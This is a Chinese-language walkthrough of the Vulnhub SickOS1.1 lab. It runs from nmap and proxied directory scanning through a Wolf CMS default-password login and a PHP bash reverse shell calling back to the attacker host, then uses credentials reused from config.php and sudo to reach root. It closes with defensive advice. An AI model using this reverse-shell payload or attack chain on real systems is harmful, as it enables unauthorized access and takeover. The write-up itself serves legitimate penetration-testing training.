Vulnhub靶机实操笔记-SickOS1.1-解法一
字数 1420 2025-08-10 21:10:14
SickOS1.1 靶机渗透测试实战教程
靶机概述
SickOS1.1 是 Vulnhub 上的一个中等难度靶机,主要考察渗透测试人员对代理服务器利用、CMS 漏洞利用和 Linux 提权等技能。本教程将详细记录从信息收集到最终获取 root 权限的完整过程。
环境准备
- 攻击机:Kali Linux (IP: 192.168.32.131)
- 靶机:SickOS1.1 (IP: 192.168.32.137)
- 靶机下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z
渗透测试流程
一、信息收集
1. 主机发现
sudo nmap -sn 192.168.32.0/24
确认靶机 IP 为 192.168.32.137
2. 端口扫描
快速扫描开放端口:
sudo nmap --min-rate 10000 -p- 192.168.32.137
发现开放端口:22(SSH)、3128、8080
3. 服务版本探测
TCP 扫描:
sudo nmap -sT -sV -O -p22,3128,8080 192.168.32.137
UDP 扫描:
sudo nmap -sU -p22,3128,8080 192.168.32.137
发现 3128 端口运行 Squid 代理服务器 (版本 3.1.19)
4. 漏洞扫描
sudo nmap --script=vuln -p22,3128,8080 192.168.32.137
二、Squid 代理服务器利用
1. 访问 Squid 代理
通过浏览器访问 http://192.168.32.137:3128 确认代理服务运行
2. 目录扫描
使用 dirb 通过代理扫描 web 目录:
sudo dirb http://192.168.32.137 -p http://192.168.32.137:3128
关键发现:
/robots.txt提示 wolfcms- 访问
http://192.168.32.137/wolfcms确认 Wolf CMS 存在
三、Wolf CMS 漏洞利用
1. 后台登录
访问后台登录页面:
http://192.168.32.137/wolfcms/?/admin/login
尝试弱口令:
- 用户名:admin
- 密码:admin
成功登录后台
2. 上传 PHP 反弹 Shell
在 Articles 部分编辑页面,插入 PHP 反弹 Shell 代码:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/443 0>&1'");?>
3. 获取反向 Shell
在 Kali 上启动监听:
nc -lvnp 443
访问 Articles 页面触发 PHP 代码,成功获取反向 Shell
四、内网提权
1. 系统信息收集
uname -a
确认系统名为 SickOs
2. 用户信息收集
cat /etc/passwd
发现有交互 shell 的用户:root、sickos
3. 配置文件检查
查看当前目录下的 config.php 文件:
vi config.php
发现数据库凭据:
- 用户名:root
- 密码:john@123
4. 密码爆破尝试
尝试用获得的密码爆破系统用户:
- wolf cms: admin/admin
- 数据库: root/john@123
- 系统用户: sickos/john@123 (成功)
5. Sudo 提权
检查 sudo 权限:
sudo -l
发现 sickos 用户有所有 sudo 权限,直接提权:
sudo /bin/bash
成功获取 root 权限
关键知识点总结
-
代理服务器利用:
- Squid 代理服务器可用于绕过某些访问限制
- 扫描工具需要配置代理才能发现隐藏内容
-
CMS 漏洞利用:
- 弱口令是常见突破口
- 后台文件编辑功能可被用于代码执行
-
Linux 提权:
- 配置文件常包含敏感信息
- 密码复用是常见问题
- Sudo 权限检查是提权关键步骤
-
渗透测试方法论:
- 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升
- 每个阶段都要仔细记录发现的信息
防御建议
- 避免使用弱口令和默认凭据
- 限制代理服务器的访问权限
- CMS 后台应限制代码执行功能
- 避免密码复用
- 合理配置 sudo 权限
- 定期检查系统配置文件权限
通过本教程,您应该掌握了从信息收集到最终提权的完整渗透测试流程,以及针对此类系统的防御措施。